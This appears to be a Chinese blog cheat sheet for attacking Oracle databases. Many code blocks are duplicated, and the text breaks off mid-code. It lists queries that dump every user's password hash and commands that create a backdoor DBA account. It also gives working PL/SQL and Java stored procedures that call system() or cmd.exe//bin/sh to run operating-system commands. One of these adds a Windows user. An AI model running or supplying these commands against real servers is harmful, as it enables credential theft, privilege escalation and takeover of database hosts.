第一部分基本查询指令普通浏览复制代码打印代码
select * from V$PWFILE_USERS //查看dba用户 
select * from v$version //查看oracle版本以及系统版本 
select * from session_privs;// 查看当前用户拥有的权限值 
select * from user_role_privs\\查询当前用户角色 
select * from user_sys_privs\\查询当前用户系统权限 
 
 
select username,password from dba_users; //查看所有用户密码hash 
select * from dba_sys_privs where grantee='SYSTEM';\\查系统权限 
grant select any dictionary to system with admin option;\\登陆不上OEM时候需要此权限 
Select name,password FROM user$ Where name='SCOTT'; //低版本查看单用户密码 
Select username,decode(password,NULL,'NULL',password) password FROM dba_users; //查看用户hash 
create user bob identified by iloveyou;\\建用户bob密码iloveyou 
grant dba to bob;\\赋予bob DBA权限 
grant execute on xmldom to bob \\赋予用户execute 
Create ROLE "javauserpriv" NOT IDENTIFIED 
Create ROLE "javasyspriv" NOT IDENTIFIED \\当提示role 'JAVASYSPRIV' does not exist使用 
select grantee from dba_role_privs where granted_role='DBA'; \\检查那些用户有DBA权限 
select * from dba_directories;\\查看路径所在目录 

select * from V$PWFILE_USERS //查看dba用户
select * from v$version //查看oracle版本以及系统版本
select * from session_privs;// 查看当前用户拥有的权限值
select * from user_role_privs\\查询当前用户角色
select * from user_sys_privs\\查询当前用户系统权限


select username,password from dba_users; //查看所有用户密码hash
select * from dba_sys_privs where grantee='SYSTEM';\\查系统权限
grant select any dictionary to system with admin option;\\登陆不上OEM时候需要此权限
Select name,password FROM user$ Where name='SCOTT'; //低版本查看单用户密码
Select username,decode(password,NULL,'NULL',password) password FROM dba_users; //查看用户hash
create user bob identified by iloveyou;\\建用户bob密码iloveyou
grant dba to bob;\\赋予bob DBA权限
grant execute on xmldom to bob \\赋予用户execute
Create ROLE "javauserpriv" NOT IDENTIFIED
Create ROLE "javasyspriv" NOT IDENTIFIED \\当提示role 'JAVASYSPRIV' does not exist使用
select grantee from dba_role_privs where granted_role='DBA'; \\检查那些用户有DBA权限
select * from dba_directories;\\查看路径所在目录第二部分,创建java,执行系统命令普通浏览复制代码打印代码
Create or REPLACE LIBRARY exec_shell AS 'c:\windows\system32\msvcrt.dll'; 
/ 
show errors 
Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); 
end oracmd; 
/ 
show errors 
Create or REPLACE PACKAGE BODY oracmd IS 
PROCEDURE exec(cmdstring IN CHAR) 
IS EXTERNAL 
NAME "system" 
LIBRARY exec_shell 
LANGUAGE C; 
end oracmd; 
/ 
show errors 

Create or REPLACE LIBRARY exec_shell AS 'c:\windows\system32\msvcrt.dll';
/
show errors
Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
Create or REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors上面这个没有回显的

如果不行可以使用下面这个普通浏览复制代码打印代码
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME\msvcrt.dll'; 
/ 
show errors 
Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); 
end oracmd; 
/ 
show errors 
Create or REPLACE PACKAGE BODY oracmd IS 
PROCEDURE exec(cmdstring IN CHAR) 
IS EXTERNAL 
NAME "system" 
LIBRARY exec_shell 
LANGUAGE C; 
end oracmd; 
/ 
show errors 

Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME\msvcrt.dll';
/
show errors
Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
Create or REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors执行完后
执行普通浏览复制代码打印代码
exec oracmd.exec ('net1 user robert iloveyou /add'); 

exec oracmd.exec ('net1 user robert iloveyou /add');no2.普通浏览复制代码打印代码
Create or REPLACE AND COMPILE JAVA SOURCE NAMED "Host" AS 
import java.io.*; 
public class Host { 
public static void executeCommand(String command) { 
try { 
String[] finalCommand; 
if (isWindows()) { 
finalCommand = new String[4]; 
// Use the appropriate path for your windows version. 
finalCommand[0] = "C:\\windows\\system32\\cmd.exe";  // Windows XP/2003 
//finalCommand[0] = "C:\\winnt\\system32\\cmd.exe";  // Windows NT/2000 
finalCommand[1] = "/y"; 
finalCommand[2] = "/c"; 
finalCommand[3] = command; 
} 
else { 
finalCommand = new String[3]; 
finalCommand[0] = "/bin/sh"; 
finalCommand[1] = "-c"; 
finalCommand[2] = command; 
} 
 
final Process pr = Runtime.getRuntime().exec(finalCommand); 
pr.waitFor(); 
 
new Thread(new Runnable(){ 
public void run() { 
BufferedReader br_in = null; 
try { 
br_in = new BufferedReader(new InputStreamReader(pr.getInputStream())); 
String buff = null; 
while ((buff = br_in.readLine()) != null) { 
System.out.println("Process out :" + buff); 
try {Thread.sleep(100); } catch(Exception e) {} 
} 
br_in.close(); 
} 
catch (IOException ioe) { 
System.out.println("Exception caught printing process output."); 
ioe.printStackTrace(); 
} 
finally { 
try { 
br_in.close(); 
} catch (Exception ex) {} 
} 
} 
}).start(); 
 
new Thread(new Runnable(){ 
public void run() { 
BufferedReader br_err = null; 
try { 
br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream())); 
String buff = null; 
while ((buff = br_err.readLine()) != null) { 
System.out.println("Process err :" + buff); 
try {Thread.sleep(100); } catch(Exception e) {} 
} 
br_err.close(); 
} 
catch (IOException ioe) { 
System.out.println("Exception caught printing process error."); 
ioe.printStackTrace(); 
} 
finally { 
try { 
br_err.close(); 
} catch (Exception ex) {} 
} 
} 
}).start(); 
} 
catch (Exception ex) { 
System.out.println(ex.getLocalizedMessage()); 
} 
} 
 
public static boolean isWindows() { 
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) 
return true; 
else 
return false; 
} 
 
}; 
/ 
Create or REPLACE PROCEDURE host_command (p_command  IN  VARCHAR2) 
AS LANGUAGE JAVA 
NAME 'Host.executeCommand (java.lang.String)'; 
/ 
EXEC DBMS_JAVA.grant_permission('SYSTEM', 'java.io.FilePermission', '<>', 'read ,write, execute, delete'); 
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); 
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); 
/ 
DECLARE 
l_output DBMS_OUTPUT.chararr; 
l_lines  INTEGER := 1000; 
BEGIN 
DBMS_OUTPUT.enable(1000000); 
DBMS_JAVA.set_output(1000000); 
 
host_command('dir C:\'); 
 
DBMS_OUTPUT.get_lines(l_output, l_lines); 
END; 

Create or REPLACE AND COMPILE JAVA SOURCE NAMED "Host" AS
import java.io.*;
public class Host {
public static void executeCommand(String command) {
try {
String[] finalCommand;
if (isWindows()) {
finalCommand = new String[4];
// Use the appropriate path for your windows version.
finalCommand[0] = "C:\\windows\\system32\\cmd.exe";  // Windows XP/2003
//finalCommand[0] = "C:\\winnt\\system32\\cmd.exe";  // Windows NT/2000
finalCommand[1] = "/y";
finalCommand[2] = "/c";
finalCommand[3] = command;
}
else {
finalCommand = new String[3];
finalCommand[0] = "/bin/sh";
finalCommand[1] = "-c";
finalCommand[2] = command;
}

final Process pr = Runtime.getRuntime().exec(finalCommand);
pr.waitFor();

new Thread(new Runnable(){
public void run() {
BufferedReader br_in = null;
try {
br_in = new BufferedReader(new InputStreamReader(pr.getInputStream()));
String buff = null;
while ((buff = br_in.readLine()) != null) {
System.out.println("Process out :" + buff);
try {Thread.sleep(100); } catch(Exception e) {}
}
br_in.close();
}
catch (IOException ioe) {
System.out.println("Exception caught printing process output.");
ioe.printStackTrace();
}
finally {
try {
br_in.close();
} catch (Exception ex) {}
}
}
}).start();

new Thread(new Runnable(){
public void run() {
BufferedReader br_err = null;
try {
br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream()));
String buff = null;
while ((buff = br_err.readLine()) != null) {
System.out.println("Process err :" + buff);
try {Thread.sleep(100); } catch(Exception e) {}
}
br_err.close();
}
catch (IOException ioe) {
System.out.println("Exception caught printing process error.");
ioe.printStackTrace();
}
finally {
try {
br_err.close();
} catch (Exception ex) {}
}
}
}).start();
}
catch (Exception ex) {
System.out.println(ex.getLocalizedMessage());
}
}

public static boolean isWindows() {